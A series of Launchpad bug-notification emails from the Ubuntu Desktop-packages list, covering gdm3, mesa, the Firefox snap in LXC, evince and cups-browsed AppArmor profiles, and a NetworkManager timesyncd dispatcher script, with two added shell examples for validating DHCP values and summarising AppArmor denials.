[Desktop-packages] [Bug 2062128] [NEW] Booting with nvidia proprietary drivers 550.67 results in gdm3 being displayed on X11 rather than Wayland
Public bug reported:

I am testing Ubuntu 24.04 beta and using the proprietary NVIDIA drivers (550.67). Prior to installing the drivers packages (using nouveau), the system would load gdm3 in Wayland. After installing the drivers package, the system would load gdm3 in X11.

This appears to be caused by the configuration file at /usr/lib/udev/rules.d/61-gdm.rules

However, according to the comments in the rules file, it should prefer Wayland:

# Disable wayland when nvidia modeset is disabled or when drivers are a lower
# version than 470,
# For versions above 470 but lower than 510 prefer Xorg,
# Above 510, prefer Wayland.

I am able to work around this by making a system override on the file, in /etc/udev/rules.d:

lrwxrwxrwx 1 root root 9 Apr 18 00:34 61-gdm.rules -> /dev/null

With this in place, when booting, gdm3 will be loaded with Wayland.

** Affects: gdm3 (Ubuntu)
   Importance: Undecided
   Status: New

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to gdm3 in Ubuntu.
https://bugs.launchpad.net/bugs/2062128

Title:
  Booting with nvidia proprietary drivers 550.67 results in gdm3 being displayed on X11 rather than Wayland

Status in gdm3 package in Ubuntu:
  New

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/gdm3/+bug/2062128/+subscriptions

--
Mailing list: https://launchpad.net/~desktop-packages
Post to     : desktop-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~desktop-packages
More help   : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 2003339] Re: kwin_x11: The X11 connection broke: I/O error (code 1)
According to the launchpad page for mesa 22.2.5-0ubuntu0.1~22.04.2 (https://launchpad.net/ubuntu/+source/mesa/22.2.5-0ubuntu0.1~22.04.2) the package is still in proposed, not updates. @tjaalton's message in #72 suggests it has been released to updates but this appears incorrect.

I'm on 22.04 with the updates archive enabled but not proposed and I'm not seeing the available update. Temporarily enabling proposed and looking at upgradable packages shows 22.2.5-0ubuntu0.1~22.04.2 which matches up with the launchpad page.

Is there an ETA for this package to land in updates?

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to mesa in Ubuntu.
https://bugs.launchpad.net/bugs/2003339

Title:
  kwin_x11: The X11 connection broke: I/O error (code 1)

Status in KDE Base Workspace:
  Fix Released
Status in Mesa:
  Fix Released
Status in kwin package in Ubuntu:
  Invalid
Status in mesa package in Ubuntu:
  Fix Released
Status in kwin source package in Jammy:
  Invalid
Status in mesa source package in Jammy:
  Fix Released
Status in kwin package in Debian:
  New

Bug description:
  [Impact]
  kwin might crash after running some time

  Two commits have been reverted upstream since 22.2.x branch was closed, needs those backported to fix this.

  [Test case]
  Run kwin for a day or so, which is usually enough time to hit this. Crash happens mostly on a notification popups, so system must be actively receiving notifications to test the crash. Without that crash may not happen even in a week of runtime.

  [Where things could go wrong]
  This just reverts two commits, and they have been upstream for a few months now, so these causing a regression is unlikely.
[Desktop-packages] [Bug 1994453] Re: Firefox Snap cannot be installed in an LXC Container
I also see this on a 20.04 host with a 20.04 container.

$ lxc version
Client version: 5.0.2
Server version: 5.0.2
$ lxc launch ubuntu:20.04 foo
$ lxc stop foo
$ lxc config set foo security.nesting true
$ lxc start foo
$ lxc shell foo
root@foo:~# snap install firefox
error: cannot perform the following tasks:
- Run hook connect-plug-host-hunspell of snap "firefox" (run hook "connect-plug-host-hunspell":
-
update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/cups/doc-root /usr/share/cups/doc-root none bind,ro 0 0): cannot open directory "/var/lib": permission denied
update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/gimp/2.0/help /usr/share/gimp/2.0/help none bind,ro 0 0): cannot open directory "/var/lib": permission denied
update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/gtk-doc /usr/share/gtk-doc none bind,ro 0 0): cannot open directory "/var/lib": permission denied
update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/libreoffice/help /usr/share/libreoffice/help none bind,ro 0 0): cannot open directory "/var/lib": permission denied
update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/xubuntu-docs /usr/share/xubuntu-docs none bind,ro 0 0): cannot open directory "/var/lib": permission denied
error: error running snapctl: cannot start mount unit: systemctl command [start var-snap-firefox-common-host\x2dhunspell.mount] failed with exit status 1: A dependency job for var-snap-firefox-common-host\x2dhunspell.mount failed. See 'journalctl -xe' for details.
-)

No AppArmor denials on the host or within the container.

root@foo:~# journalctl -xe | cat
Mar 28 14:26:26 foo snapd[196]: -
Mar 28 14:26:26 foo systemd[1]: snap.firefox.hook.connect-plug-host-hunspell.a7817955-d538-4a15-ae4e-1f7f00c4d00d.scope: Succeeded.
-- Subject: Unit succeeded
-- Defined-By: systemd
-- Support: http://www.ubuntu.com/support
--
-- The unit snap.firefox.hook.connect-plug-host-hunspell.a7817955-d538-4a15-ae4e-1f7f00c4d00d.scope has successfully entered the 'dead' state.
Mar 28 14:26:28 foo systemd[370]: run-snapd-ns-firefox.mnt.mount: Succeeded.
-- Subject: Unit succeeded
-- Defined-By: systemd
-- Support: http://www.ubuntu.com/support
--
-- The unit UNIT has successfully entered the 'dead' state.
Mar 28 14:26:28 foo systemd[1]: run-snapd-ns-firefox.mnt.mount: Succeeded.
-- Subject: Unit succeeded
-- Defined-By: systemd
-- Support: http://www.ubuntu.com/support
--
-- The unit run-snapd-ns-firefox.mnt.mount has successfully entered the 'dead' state.
Mar 28 14:26:28 foo systemd[370]: snap-firefox-2487.mount: Succeeded.
-- Subject: Unit succeeded
-- Defined-By: systemd
-- Support: http://www.ubuntu.com/support
--
-- The unit UNIT has successfully entered the 'dead' state.
Mar 28 14:26:28 foo systemd[1]: snap-firefox-2487.mount: Succeeded.
-- Subject: Unit succeeded
-- Defined-By: systemd
-- Support: http://www.ubuntu.com/support
--
-- The unit snap-firefox-2487.mount has successfully entered the 'dead' state.
Mar 28 14:26:28 foo systemd[1]: Reloading.
Mar 28 14:26:28 foo systemd[1]: Cannot find unit for notify message of PID 1318, ignoring.
Mar 28 14:26:29 foo snapd[196]: handlers.go:662: Reported install problem for "firefox" as Crash report successfully submitted.

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to firefox in Ubuntu.
https://bugs.launchpad.net/bugs/1994453

Title:
  Firefox Snap cannot be installed in an LXC Container

Status in lxd:
  New
Status in snapd:
  New
Status in firefox package in Ubuntu:
  Confirmed

Bug description:
  $ sudo snap install firefox
  error: cannot perform the following tasks:
  - Run hook connect-plug-host-hunspell of snap "firefox" (run hook "connect-plug-host-hunspell":
  -
  update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/cups/doc-root /usr/share/cups/doc-root none bind,ro 0 0): cannot create directory "/usr/share/cups/doc-root": permission denied
  update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/gimp/2.0/help /usr/share/gimp/2.0/help none bind,ro 0 0): cannot create directory "/usr/share/gimp/2.0": permission denied
  update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/libreoffice/help /usr/share/libreoffice/help none bind,ro 0 0): cannot create directory "/usr/share/libreoffice/help": permission denied
  error: error running snapctl: cannot start mount unit: systemctl command [start var-snap-firefox-common-host\x2dhunspell.mount] failed with exit status 1: A dependency job for var-snap-firefox-common-host\x2dhunspell.mount failed. See 'journalctl -xe' for details.
[Desktop-packages] [Bug 1994453] Re: Firefox Snap cannot be installed in an LXC Container
** Also affects: snapd
   Importance: Undecided
   Status: New

** Also affects: lxd
   Importance: Undecided
   Status: New

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to firefox in Ubuntu.
https://bugs.launchpad.net/bugs/1994453

Title:
  Firefox Snap cannot be installed in an LXC Container

Status in lxd:
  New
Status in snapd:
  New
Status in firefox package in Ubuntu:
  Confirmed

Bug description:
  $ sudo snap install firefox
  error: cannot perform the following tasks:
  - Run hook connect-plug-host-hunspell of snap "firefox" (run hook "connect-plug-host-hunspell":
  -
  update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/cups/doc-root /usr/share/cups/doc-root none bind,ro 0 0): cannot create directory "/usr/share/cups/doc-root": permission denied
  update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/gimp/2.0/help /usr/share/gimp/2.0/help none bind,ro 0 0): cannot create directory "/usr/share/gimp/2.0": permission denied
  update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/libreoffice/help /usr/share/libreoffice/help none bind,ro 0 0): cannot create directory "/usr/share/libreoffice/help": permission denied
  error: error running snapctl: cannot start mount unit: systemctl command [start var-snap-firefox-common-host\x2dhunspell.mount] failed with exit status 1: A dependency job for var-snap-firefox-common-host\x2dhunspell.mount failed. See 'journalctl -xe' for details.
  -)

  This makes it very difficult to have LXC containers with a GUI (used via VNC), as a web browser is essential.

  Workaround:
  - Add the Mozillateam PPA (https://ppa.launchpadcontent.net/mozillateam/ppa/ubuntu)
  - Create /etc/apt/preferences.d/mozilla-firefox with:

  Package: firefox*
  Pin: release o=LP-PPA-mozillateam
  Pin-Priority: 1001

  - sudo apt install firefox

  ProblemType: Bug
  DistroRelease: Ubuntu 22.04
  Package: firefox 1:1snap1-0ubuntu2
  ProcVersionSignature: Ubuntu 5.15.0-48.54-generic 5.15.53
  Uname: Linux 5.15.0-48-generic x86_64
  NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair
  ApportVersion: 2.20.11-0ubuntu82.1
  Architecture: amd64
  CasperMD5CheckResult: unknown
  CurrentDesktop: KDE
  Date: Wed Oct 26 14:16:04 2022
  InstallationDate: Installed on 2020-11-02 (722 days ago)
  InstallationMedia: Ubuntu-Server 18.04.4 LTS "Bionic Beaver" - Release amd64 (20200203.1)
  Snap.Changes: no changes found
  SourcePackage: firefox
  UpgradeStatus: Upgraded to jammy on 2022-10-03 (22 days ago)
[Desktop-packages] [Bug 1968498] [NEW] Unhandled promise rejection after screenlock/unlock
Public bug reported:

After upgrading from focal to jammy, I noticed this in my logs:

Apr 10 14:05:40 host ubuntu-appindicat...@ubuntu.com[124051]: unable to update icon for software-update-available
Apr 10 14:05:40 host gnome-shell[124051]: Unhandled promise rejection. To suppress this warning, add an error handler to your promise chain with .catch() or a try-catch block around your await expression.
Stack trace of the failed promise:
_checkNeededProperties@/usr/share/gnome-shell/extensions/ubuntu-appindicat...@ubuntu.com/appIndicator.js:133:33
_nameOwnerChanged@/usr/share/gnome-shell/extensions/ubuntu-appindicat...@ubuntu.com/appIndicator.js:154:18
_emit@resource:///org/gnome/gjs/modules/core/_signals.js:114:47
AppIndicatorsNameWatcher/this._watcherId<@/usr/share/gnome-shell/extensions/ubuntu-appindicat...@ubuntu.com/util.js:205:22

This happens after screenlock/unlock.

It looks like https://github.com/ubuntu/gnome-shell-extension-appindicator/issues/334 was filed for this as well.

** Affects: gnome-shell-extension-appindicator (Ubuntu)
   Importance: Undecided
   Status: New

** Description changed: After upgrading from focal to jammy, I noticed this in my logs: - Apr 10 14:05:40 iolanthe ubuntu-appindicat...@ubuntu.com[124051]: unable to update icon for software-update-available - Apr 10 14:05:40 iolanthe gnome-shell[124051]: Unhandled promise rejection. To suppress this warning, add an error handler to your promise chain with .catch() or a try-catch block around your await expression. 
Stack trace of the failed promise: - _checkNeededProperties@/usr/share/gnome-shell/extensions/ubuntu-appindicat...@ubuntu.com/appIndicator.js:133:33 - _nameOwnerChanged@/usr/share/gnome-shell/extensions/ubuntu-appindicat...@ubuntu.com/appIndicator.js:154:18 - _emit@resource:///org/gnome/gjs/modules/core/_signals.js:114:47 - AppIndicatorsNameWatcher/this._watcherId<@/usr/share/gnome-shell/extensions/ubuntu-appindicat...@ubuntu.com/util.js:205:22 + Apr 10 14:05:40 host ubuntu-appindicat...@ubuntu.com[124051]: unable to update icon for software-update-available + Apr 10 14:05:40 host gnome-shell[124051]: Unhandled promise rejection. To suppress this warning, add an error handler to your promise chain with .catch() or a try-catch block around your await expression. Stack trace of the failed promise: + _checkNeededProperties@/usr/share/gnome-shell/extensions/ubuntu-appindicat...@ubuntu.com/appIndicator.js:133:33 + _nameOwnerChanged@/usr/share/gnome-shell/extensions/ubuntu-appindicat...@ubuntu.com/appIndicator.js:154:18 + _emit@resource:///org/gnome/gjs/modules/core/_signals.js:114:47 + AppIndicatorsNameWatcher/this._watcherId<@/usr/share/gnome-shell/extensions/ubuntu-appindicat...@ubuntu.com/util.js:205:22 This happens after screenlock/unlock. It looks like https://github.com/ubuntu/gnome-shell-extension- appindicator/issues/334 was filed for this as well.

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to gnome-shell-extension-appindicator in Ubuntu.
https://bugs.launchpad.net/bugs/1968498

Title:
  Unhandled promise rejection after screenlock/unlock

Status in gnome-shell-extension-appindicator package in Ubuntu:
  New
[Desktop-packages] [Bug 1794064] Re: Clicking a hyperlink in a PDF fails to open it if the default browser is a snap
Olivier, yes, I shouldn't be assigned.

Ian, you're right the profile is suboptimal (it's also old so likely needs updating). Do note that this is a separate named profile and evince (and if this is put in an abstraction, anything that uses the abstraction) only has the `/{,snap/core/[0-9]*/}usr/bin/snap mrCx -> snap_browser,` rule which means that it is able to run the 'snap' command (needed since everything in /snap/bin points to /usr/bin/snap) which at the time I wrote the profile meant that access to this socket was needed as part of snap run. IIRC, snapd should be protecting certain actions by uid connecting to it (eg, you are root or not), but it has been a while since I've looked at that. Evince is not a snap though so if snapd does any checks on 'is the client a snap' then those would fail and evince would be able to do whatever a non-root user could do with the 'snap' command via the socket.

For snap run, we can see that the snap_browser profile limits what can be used with 'run' since (at the time I wrote the comment) 'snap run' required being able to look at the meta/snap.yaml of the specific snap. This 'works' (worked?) but is brittle since if snap run changed to lift this requirement (eg, 'snap run' just passed the name of the unresolved symlink to snapd over the socket and let snapd start the snap, perhaps via userd, etc) then this falls apart.

The profile was put up as an example as what could be done at the time without any help from snapd. I never particularly cared for it cause it was brittle and not designed.

I'm not sure how to fix this, but here are some thoughts:

* evince is just executing stuff from /snap/bin (probably via the system's xdg-open). Assuming xdg-open, the system's xdg-open (or whatever evince is using to decide and launch the default browser) could itself be fixed in Ubuntu to launch a different command that behaved better. This wouldn't necessarily fix other distros (though this is the evince profile in Debian and Ubuntu, so *technically*, if you got this change (to presumably xdg-open) into them, you could update the evince profile in them accordingly)
* In lieu of that, if the profile still worked as intended, snapd could be hardened to look to check more than if the connecting process is root or a snap; it could also see if it is running under a non-snap profile, then limit access to the socket API accordingly. This has drawbacks and could break people who have written custom profiles similar to what I presented.
* I suppose an alternative approach would be to have symlinks in /snap/bin for things that are registered as browsers (or just the default browser) point to a designed snap command. Eg:

  /snap/bin/firefox -> /usr/bin/snap # keep the existing one too
  /snap/bin/default-browser-is-a-snap -> /usr/bin/snap-browser # name is illustrative, TBD

  Now firefox, chromium, opera, brave, etc snaps registers themselves as being capable of being a default browser with snapd, then snapd registers with the system that /snap/bin/default-browser-is-a-snap is the default browser (so system utilities like xdg-open don't need to change) and /usr/bin/snap-browser is written to be safe (eg, only able to 'snap run' the configured default browser, nothing else) and apparmor profiles are adjusted to have `/{,snap/core/[0-9]*/}usr/bin/snap-browser Uxr,` (or similar).

The /snap/bin/default-browser-is-a-snap path is illustrative and there isn't really a need for it at all. Could simply perhaps have snapd register /usr/bin/snap-browser as the default browser on the system (it now needs to know what snapd configured as the default browser snap though) and forego the symlink.

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu.
https://bugs.launchpad.net/bugs/1794064

Title:
  Clicking a hyperlink in a PDF fails to open it if the default browser is a snap

Status in apparmor package in Ubuntu:
  Confirmed
Status in evince package in Ubuntu:
  Triaged

Bug description:
  This is related to bug #1792648.

  After fixing that one (see discussion at https://salsa.debian.org/gnome-team/evince/merge_requests/1), clicking a hyperlink in a PDF opens it correctly if the default browser is a well-known application (such as /usr/bin/firefox), but it fails to do so if the default browser is a snap (e.g. the chromium snap).

  This is not a recent regression, it's not working on bionic either.

  ProblemType: Bug
  DistroRelease: Ubuntu 18.10
  Package: evince 3.30.0-2
  ProcVersionSignature: Ubuntu 4.18.0-7.8-generic 4.18.5
  Uname: Linux 4.18.0-7-generic x86_64
  NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair
  ApportVersion: 2.20.10-0ubuntu11
  Architecture: amd64
  CurrentDesktop: ubuntu:GNOME
  Date: Mon Sep 24 12:28:06 2018
  EcryptfsInUse: Yes
  InstallationDate: Installed on 2016-07-02 (813 days ago)
  InstallationMedia: Ubuntu 16.04 LTS "Xenial
[Desktop-packages] [Bug 1794064] Re: Clicking a hyperlink in a PDF fails to open it if the default browser is a snap
** Changed in: evince (Ubuntu)
   Assignee: Jamie Strandboge (jdstrand) => (unassigned)

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu.
https://bugs.launchpad.net/bugs/1794064

Title:
  Clicking a hyperlink in a PDF fails to open it if the default browser is a snap

Status in apparmor package in Ubuntu:
  Confirmed
Status in evince package in Ubuntu:
  Triaged

Bug description:
  This is related to bug #1792648.

  After fixing that one (see discussion at https://salsa.debian.org/gnome-team/evince/merge_requests/1), clicking a hyperlink in a PDF opens it correctly if the default browser is a well-known application (such as /usr/bin/firefox), but it fails to do so if the default browser is a snap (e.g. the chromium snap).

  This is not a recent regression, it's not working on bionic either.

  ProblemType: Bug
  DistroRelease: Ubuntu 18.10
  Package: evince 3.30.0-2
  ProcVersionSignature: Ubuntu 4.18.0-7.8-generic 4.18.5
  Uname: Linux 4.18.0-7-generic x86_64
  NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair
  ApportVersion: 2.20.10-0ubuntu11
  Architecture: amd64
  CurrentDesktop: ubuntu:GNOME
  Date: Mon Sep 24 12:28:06 2018
  EcryptfsInUse: Yes
  InstallationDate: Installed on 2016-07-02 (813 days ago)
  InstallationMedia: Ubuntu 16.04 LTS "Xenial Xerus" - Release amd64 (20160420.1)
  SourcePackage: evince
  UpgradeStatus: Upgraded to cosmic on 2018-09-14 (9 days ago)
  modified.conffile..etc.apparmor.d.abstractions.evince: [modified]
  mtime.conffile..etc.apparmor.d.abstractions.evince: 2018-09-24T11:35:41.904158
[Desktop-packages] [Bug 1933828] Re: NTP servers from DHCP are not propagated to timesyncd
** Changed in: oem-priority
   Importance: Undecided => Critical

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to network-manager in Ubuntu.
https://bugs.launchpad.net/bugs/1933828

Title:
  NTP servers from DHCP are not propagated to timesyncd

Status in OEM Priority Project:
  New
Status in network-manager package in Ubuntu:
  New
Status in network-manager source package in Focal:
  New

Bug description:
  Network manager gets NTP servers from DHCP but does not update timesyncd to use it which keeps using ntp.ubuntu.com.

  This is a problem on private networks which do not have access to public internet. On this type of network the configuration of timesyncd must be updated manually instead of inheriting the conf from the dhcp servers.

  This can be integrated with a NM dispatcher script such as below:

  etc/NetworkManager/dispatcher.d/10-update-timesyncd for example:

==8<=8<=8<=8<=8<==
#! /usr/bin/bash
# Ignore events that are not tied to a connection
[ -n "$CONNECTION_UUID" ] || exit
INTERFACE=$1
ACTION=$2
case $ACTION in
up | dhcp4-change | dhcp6-change)
  # Nothing to do unless DHCP supplied NTP servers
  [ -n "$DHCP4_NTP_SERVERS" ] || exit
  mkdir -p /etc/systemd/timesyncd.conf.d/
  # Write a per-connection drop-in with the DHCP-supplied servers
  cat<<EOF > /etc/systemd/timesyncd.conf.d/$CONNECTION_UUID.conf
[Time]
NTP=$DHCP4_NTP_SERVERS
RootDistanceMaxSec=15
EOF
  systemctl restart systemd-timesyncd
  ;;
down)
  # Remove the drop-in when the connection goes down
  rm -f /etc/systemd/timesyncd.conf.d/$CONNECTION_UUID.conf
  systemctl restart systemd-timesyncd
  ;;
esac
==8<=8<=8<=8<=8<==

  ProblemType: Bug
  DistroRelease: Ubuntu 21.10
  Package: network-manager 1.30.0-1ubuntu3
  ProcVersionSignature: Ubuntu 5.11.0-18.19+21.10.1-generic 5.11.17
  Uname: Linux 5.11.0-18-generic x86_64
  NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair
  ApportVersion: 2.20.11-0ubuntu67
  Architecture: amd64
  CasperMD5CheckResult: unknown
  CurrentDesktop: ubuntu:GNOME
  Date: Mon Jun 28 14:08:52 2021
  InstallationDate: Installed on 2020-05-31 (393 days ago)
  InstallationMedia: Ubuntu 20.10 "Groovy Gorilla" - Alpha amd64 (20200527)
  RebootRequiredPkgs:
   linux-image-5.11.0-20-generic
   linux-base
  SourcePackage: network-manager
  UpgradeStatus: No upgrade log present (probably fresh install)
  nmcli-nm:
   RUNNING  VERSION  STATE      STARTUP  CONNECTIVITY  NETWORKING  WIFI-HW  WIFI      WWAN-HW  WWAN
   running  1.30.0   connected  started  full          enabled     enabled  disabled  enabled  enabled
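The dispatcher script in bug 1933828 above runs as root and copies a value from a DHCP reply straight into a timesyncd drop-in, so a variant that validates the value first is worth having. This is an added example, not part of the bug report or of NetworkManager; CONF_DIR and the function names filter_ntp_servers, valid_uuid and write_dropin are hypothetical.

```shell
#!/bin/sh
# Added example (not from the bug report): validate values before a root-run
# NetworkManager dispatcher writes them into a systemd-timesyncd drop-in.
# CONF_DIR and all function names below are hypothetical.

CONF_DIR="${CONF_DIR:-/etc/systemd/timesyncd.conf.d}"

# Print only the tokens of $1 that look like a hostname or an IP literal.
# The value comes from a DHCP reply, so it is treated as untrusted text:
# tokens containing '=', '[', ';', '$', quotes and so on are dropped, which
# also keeps a multi-line value from adding keys or sections to the drop-in.
filter_ntp_servers() {
    out=""
    set -f                          # no filename expansion while splitting
    for s in $1; do                 # splits on spaces, tabs and newlines
        case $s in
            -*|.*|*[!A-Za-z0-9.:-]*) continue ;;
        esac
        [ "${#s}" -le 253 ] || continue
        out="${out:+$out }$s"
    done
    set +f
    printf '%s' "$out"
}

# NetworkManager connection UUIDs are 36 characters of hex digits and dashes.
# Checking the shape keeps the value from being used as a path such as "../x".
valid_uuid() {
    case $1 in
        ''|*[!0-9A-Fa-f-]*) return 1 ;;
    esac
    [ "${#1}" -eq 36 ]
}

# $1 = connection UUID, $2 = raw DHCP4_NTP_SERVERS value.
# Writes the drop-in via a temp file and rename; fails if nothing valid is left.
write_dropin() {
    valid_uuid "$1" || return 1
    servers=$(filter_ntp_servers "$2")
    [ -n "$servers" ] || return 1
    mkdir -p "$CONF_DIR" || return 1
    tmp=$(mktemp "$CONF_DIR/.timesyncd.XXXXXX") || return 1
    printf '[Time]\nNTP=%s\nRootDistanceMaxSec=15\n' "$servers" > "$tmp" || return 1
    chmod 0644 "$tmp" && mv -f "$tmp" "$CONF_DIR/$1.conf"
}

# Dispatcher entry point: NetworkManager passes the interface as $1 and the
# action as $2, with CONNECTION_UUID and DHCP4_NTP_SERVERS in the environment.
case "${2:-}" in
    up|dhcp4-change|dhcp6-change)
        write_dropin "${CONNECTION_UUID:-}" "${DHCP4_NTP_SERVERS:-}" &&
            systemctl restart systemd-timesyncd
        ;;
    down)
        valid_uuid "${CONNECTION_UUID:-}" &&
            rm -f "$CONF_DIR/$CONNECTION_UUID.conf" &&
            systemctl restart systemd-timesyncd
        ;;
esac
```
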
[Desktop-packages] [Bug 1897369] Re: apparmor: Allow cups-browsed to change nice value (CAP_SYS_NICE)
Till, it allows quite a few things (from man capabilities):

CAP_SYS_NICE
  * Raise process nice value (nice(2), setpriority(2)) and change the nice value for arbitrary processes;
  * set real-time scheduling policies for calling process, and set scheduling policies and priorities for arbitrary processes (sched_setscheduler(2), sched_setparam(2), sched_setattr(2));
  * set CPU affinity for arbitrary processes (sched_setaffinity(2));
  * set I/O scheduling class and priority for arbitrary processes (ioprio_set(2));
  * apply migrate_pages(2) to arbitrary processes and allow processes to be migrated to arbitrary nodes;
  * apply move_pages(2) to arbitrary processes;
  * use the MPOL_MF_MOVE_ALL flag with mbind(2) and move_pages(2).

cups-browsed is probably just trying to renice itself, which isn't terrible for it to try, but it probably fails gracefully with this just being noise. If it does fail gracefully, you could consider an explicit deny rule to silence the log. Eg:

  deny capability sys_nice,

That said, we've normally allowed system policy (ie, those shipped in debs) to use sys_nice if they have a legitimate use case for it.

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to cups in Ubuntu.
https://bugs.launchpad.net/bugs/1897369

Title:
  apparmor: Allow cups-browsed to change nice value (CAP_SYS_NICE)

Status in cups package in Ubuntu:
  Confirmed

Bug description:
  In Ubuntu 20.04.1 with *cups-browsed* 1.27.4-1, apparmor prevents `/usr/sbin/cups-browsed` to change its nice value.

  $ sudo dmesg | grep apparmor
  [541870.509461] audit: type=1400 audit(1600898428.089:60): apparmor="DENIED" operation="capable" profile="/usr/sbin/cups-browsed" pid=62030 comm="cups-browsed" capability=23 capname="sys_nice"
  [628298.779668] audit: type=1400 audit(1600984854.115:61): apparmor="DENIED" operation="capable" profile="/usr/sbin/cups-browsed" pid=66850 comm="cups-browsed" capability=23 capname="sys_nice"
  [714667.424963] audit: type=1400 audit(1601071220.527:62): apparmor="DENIED" operation="capable" profile="/usr/sbin/cups-browsed" pid=76828 comm="cups-browsed" capability=23 capname="sys_nice"
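Before choosing between granting sys_nice and the `deny capability sys_nice,` rule discussed in bug 1897369 above, it helps to see how often each profile is denied each capability. The following is an added example, not part of the bug report; summarize_denials and sample_log are hypothetical names, the first three sample lines are the ones quoted in the report and the fourth is constructed to show that non-capability denials are ignored.

```shell
#!/bin/sh
# Added example (not from the bug report): count AppArmor capability denials
# per profile in kernel audit lines shaped like the dmesg output quoted above.
# summarize_denials and sample_log are hypothetical names.

# Reads log lines on stdin and prints "<count> <profile> <capname>" for each
# pair, most frequent first. Assumes profile names contain no spaces.
summarize_denials() {
    awk '
    /apparmor="DENIED"/ && /operation="capable"/ {
        profile = ""; cap = ""
        for (i = 1; i <= NF; i++) {
            if ($i ~ /^profile=/) { profile = $i; sub(/^profile=/, "", profile) }
            if ($i ~ /^capname=/) { cap = $i; sub(/^capname=/, "", cap) }
        }
        gsub(/"/, "", profile); gsub(/"/, "", cap)
        if (profile != "" && cap != "") n[profile " " cap]++
    }
    END { for (k in n) print n[k], k }
    ' | sort -k1,1nr -k2
}

# Lines 1-3: copied from the bug report. Line 4: constructed file-access
# denial, included only to show that it is not counted as a capability denial.
sample_log() {
    cat <<'EOF'
[541870.509461] audit: type=1400 audit(1600898428.089:60): apparmor="DENIED" operation="capable" profile="/usr/sbin/cups-browsed" pid=62030 comm="cups-browsed" capability=23 capname="sys_nice"
[628298.779668] audit: type=1400 audit(1600984854.115:61): apparmor="DENIED" operation="capable" profile="/usr/sbin/cups-browsed" pid=66850 comm="cups-browsed" capability=23 capname="sys_nice"
[714667.424963] audit: type=1400 audit(1601071220.527:62): apparmor="DENIED" operation="capable" profile="/usr/sbin/cups-browsed" pid=76828 comm="cups-browsed" capability=23 capname="sys_nice"
[714700.000000] audit: type=1400 audit(1601071253.000:63): apparmor="DENIED" operation="open" profile="/usr/sbin/cups-browsed" name="/constructed/example/path" pid=76828 comm="cups-browsed" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
EOF
}

sample_log | summarize_denials
```

On a live system the same function can be fed from `dmesg` or `journalctl -k` instead of the embedded sample.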
[Desktop-packages] [Bug 1871148] Re: services start before apparmor profiles are loaded
This was fixed in snapd in 2.44 via https://github.com/snapcore/snapd/pull/8467

** Changed in: snapd (Ubuntu)
   Status: In Progress => Fix Released

** Changed in: snapd (Ubuntu Focal)
   Status: In Progress => Fix Released

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to zsys in Ubuntu.
https://bugs.launchpad.net/bugs/1871148

Title:
  services start before apparmor profiles are loaded

Status in AppArmor:
  Invalid
Status in snapd:
  Fix Released
Status in apparmor package in Ubuntu:
  Fix Released
Status in snapd package in Ubuntu:
  Fix Released
Status in zsys package in Ubuntu:
  Invalid
Status in apparmor source package in Focal:
  Fix Released
Status in snapd source package in Focal:
  Fix Released
Status in zsys source package in Focal:
  Invalid

Bug description:
  Per discussion with Zyga in #snapd on Freenode, I have hit a race condition where services are being started by the system before apparmor has been started. I have a complete log of my system showing the effect somewhere within at https://paste.ubuntu.com/p/Jyx6gfFc3q/.

  Restarting apparmor using `sudo systemctl restart apparmor` is enough to bring installed snaps back to full functionality.

  Previously, when running any snap I would receive the following in the terminal:

  ---
  cannot change profile for the next exec call: No such file or directory
  snap-update-ns failed with code 1: File exists
  ---

  Updated to add for Jamie:

  $ snap version
  snap    2.44.2+20.04
  snapd   2.44.2+20.04
  series  16
  ubuntu  20.04
  kernel  5.4.0-21-generic
[Desktop-packages] [Bug 1891338] Re: apparmor misconfigured for envice
You are right that there are two places this is defined: in /etc/apparmor.d/abstractions/ubuntu-browsers.d/ubuntu-integration and in /etc/apparmor.d/usr.bin.evince. I'll adjust apparmor to fix ubuntu-integration to use the exo-open abstraction.

There is an evince task though because we don't want it to use the ubuntu-integration abstraction. Instead the exo-open stanza in the usr.bin.evince should just include the exo-open abstraction. Ie, replace this:

  # For Xubuntu to launch the browser
  /usr/bin/exo-open ixr,
  /usr/lib/@{multiarch}/xfce4/exo-1/exo-helper-1 ixr,
  /etc/xdg/xdg-xubuntu/xfce4/helpers.rc r,
  /etc/xdg/xfce4/helpers.rc r,

with this:

  # For Xubuntu to launch the browser
  #include <abstractions/exo-open>

** Also affects: evince (Ubuntu)
   Importance: Undecided
   Status: New

** Changed in: apparmor (Ubuntu)
   Status: New => In Progress

** Changed in: evince (Ubuntu)
   Status: New => Triaged

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu.
https://bugs.launchpad.net/bugs/1891338

Title:
  apparmor misconfigured for envice

Status in apparmor package in Ubuntu:
  In Progress
Status in evince package in Ubuntu:
  Triaged

Bug description:
